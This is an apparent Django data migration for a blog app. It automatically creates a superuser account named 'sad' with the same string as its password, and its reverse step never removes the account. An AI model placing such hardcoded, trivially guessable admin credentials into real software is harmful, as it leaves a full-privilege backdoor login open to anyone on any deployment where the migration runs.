# Generated by Django 3.2.25 on 2024-05-27 16:00
from django.contrib.auth import get_user_model
from django.db import migrations

def forwards_func(apps, schema_editor):
    User = get_user_model()
    p = User(username='sad', is_staff=True, is_superuser=True)
    p.set_password('sad')
    p.save()

def backwards_func(apps, schema_editor):
    pass

class Migration(migrations.Migration):
    dependencies = [
        ('blog', '0002_comment'),
    ]
    operations = [
        migrations.RunPython(forwards_func, backwards_func),
    ]
